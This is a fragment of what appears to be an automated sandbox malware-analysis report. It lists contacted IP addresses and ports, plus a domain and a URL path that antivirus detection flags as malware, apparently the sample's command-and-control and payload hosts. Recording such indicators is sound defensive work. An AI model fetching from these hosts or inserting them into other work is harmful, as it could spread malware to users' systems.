 unknown unknown
unknown unknown true
149.62.173.247:8080
 unknown unknown
unknown unknown true
167.71.148.58:443
 unknown unknown
unknown unknown true
46.105.114.137:8080
 unknown unknown
unknown unknown true
110.39.162.2:443
 unknown unknown
unknown unknown true
190.210.246.253:80
 unknown unknown
unknown unknown true
81.214.253.80:443
 unknown unknown
unknown unknown true
138.197.99.250:8080
 unknown unknown
unknown unknown true

Contacted Domains

Name IP Active
shannared.com 192.169.223.13 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://shannared.com/content/lhALeS/ true
  • Avira URL Cloud: malware
 unknown